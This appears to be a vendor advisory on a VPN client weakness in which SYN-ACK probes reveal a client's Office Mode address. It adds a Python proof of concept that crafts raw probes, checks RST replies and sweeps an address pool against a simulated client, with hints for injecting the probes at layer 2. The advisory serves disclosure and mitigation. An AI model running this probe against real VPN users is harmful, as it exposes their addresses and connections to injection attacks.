Incoming packets addressed to the Office Mode address are handled first by the operating system's TCP stack. When a SYN-ACK packet arrives for a connection that does not exist, the operating system replies with a RST. By sending SYN-ACK probes to candidate addresses and watching for that RST, the attacker can determine the Office Mode IP address assigned to the client (stage 1 of the attack).
In the same manner, the attacker can infer which external IP addresses the user has connections to, then guess the TCP sequence numbers of such a connection and try to interfere with it, for example by injecting packets into it.
Important notes:
- Since the traffic is encrypted inside our VPN tunnel, the attacker can neither read nor modify any data.
- Since most outgoing traffic today is carried over SSL/TLS (inside the VPN tunnel), the SSL stack rejects any data the attacker injects, as it fails the SSL integrity checks, and the TCP sequence will not be disrupted either.
The Check Point Firewall Blade on Endpoint Client for Mac can be used to block incoming connections to the Office Mode IP address, which stops the attack at stage 1: without a RST reply, the attacker cannot learn the Office Mode address.
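The stage-1 probe and the effect of dropping inbound packets to the Office Mode address, as an added example that is not part of this advisory or of any Check Point product. It builds a raw IPv4/TCP SYN-ACK probe with valid checksums, checks a reply against the RFC 793 reset-generation rule (a RST answering a segment that carried ACK has SEQ equal to that segment's ACK), and sweeps a candidate range. The attacker address 198.51.100.7, the pool 10.12.0.0/28, the port numbers and the `simulated_client` model of the victim's TCP stack are all constructed for the demo; a real probe would additionally have to be injected on the access-network segment towards the client's MAC address, which this example deliberately leaves out.

```python
"""Stage-1 Office Mode address probe: raw SYN-ACK, RST check, candidate sweep (added example)."""
import ipaddress
import socket
import struct

TCP_FLAG_SYN = 0x02
TCP_FLAG_RST = 0x04
TCP_FLAG_ACK = 0x10


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words; 0 for a header whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_packet(src_ip, dst_ip, sport, dport, seq, ack, flags):
    """Return a 40-byte header-only IPv4+TCP segment with correct IP and TCP checksums."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp)))
    tcp = tcp[:16] + struct.pack("!H", inet_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64,
                     socket.IPPROTO_TCP, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + tcp


def parse_packet(pkt):
    """Parse an IPv4/TCP packet into its addressing, sequence numbers and flags; None if not TCP."""
    if len(pkt) < 20 or pkt[9] != socket.IPPROTO_TCP:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, seq, ack, _, flags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags}


def verify_checksums(pkt) -> bool:
    """True if both the IP header checksum and the TCP checksum of a header-only segment verify."""
    ihl = (pkt[0] & 0x0F) * 4
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(pkt) - ihl)
    return inet_checksum(pkt[:ihl]) == 0 and inet_checksum(pseudo + pkt[ihl:]) == 0


def build_probe(attacker_ip, candidate_ip, sport=443, dport=51000, seq=0x11111111, ack=0x22222222):
    """SYN-ACK for a connection the victim never opened (constructed port/sequence values)."""
    return build_tcp_packet(attacker_ip, candidate_ip, sport, dport, seq, ack, TCP_FLAG_SYN | TCP_FLAG_ACK)


def is_rst_for_probe(reply, probe) -> bool:
    """RFC 793 reset generation: for an incoming segment with ACK, the host sends a RST whose
    SEQ is that segment's ACK, from the probed address/port back to the prober."""
    r, p = parse_packet(reply), parse_packet(probe)
    if r is None or p is None:
        return False
    return bool(r["flags"] & TCP_FLAG_RST) and r["src"] == p["dst"] and r["dst"] == p["src"] \
        and r["sport"] == p["dport"] and r["dport"] == p["sport"] and r["seq"] == p["ack"]


def candidate_hosts(cidr):
    """All host addresses of an Office Mode pool given as CIDR, as strings."""
    return [str(h) for h in ipaddress.ip_network(cidr).hosts()]


def find_office_mode_address(attacker_ip, candidates, exchange):
    """Sweep candidates; exchange(probe) delivers the probe to the client and returns the
    reply bytes or None. The first address that answers with a matching RST is the victim's."""
    for cand in candidates:
        probe = build_probe(attacker_ip, cand)
        reply = exchange(probe)
        if reply is not None and is_rst_for_probe(reply, probe):
            return cand
    return None


def simulated_client(office_mode_ip, firewall_blocks_inbound=False):
    """Offline model of the victim (constructed for the demo): a SYN-ACK for a non-existing
    connection to its own Office Mode address gets a RST; any other address gets nothing.
    firewall_blocks_inbound models the Firewall Blade dropping inbound packets to that address."""
    def exchange(probe):
        p = parse_packet(probe)
        if p["dst"] != office_mode_ip or firewall_blocks_inbound or not (p["flags"] & TCP_FLAG_ACK):
            return None
        return build_tcp_packet(p["dst"], p["src"], p["dport"], p["sport"], p["ack"], 0, TCP_FLAG_RST)
    return exchange


if __name__ == "__main__":
    pool = candidate_hosts("10.12.0.0/28")
    print("unprotected:", find_office_mode_address("198.51.100.7", pool, simulated_client("10.12.0.9")))
    print("firewall on:", find_office_mode_address("198.51.100.7", pool,
                                                    simulated_client("10.12.0.9", True)))
```

Run as a script it finds 10.12.0.9 in the unprotected case and nothing once inbound packets to the Office Mode address are dropped. To turn the sweep into a real lab check against your own client, replace `simulated_client` with an `exchange` that injects the frame on the access network (root and an AF_PACKET socket on Linux) and captures the reply; note that the probe's destination is the client's virtual address, so it is not routable and must be delivered at layer 2.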
The Gaia operating system, our site-to-site IPsec VPN, and Capsule Workspace are not affected by this vulnerability.
The fix for this issue needs to come from the operating system maintainers, as the bug is in their code. It is always recommended to keep your operating system up to date with the latest updates.
Applies To:
- Remote Access VPN clients
- SandBlast Mobile Protect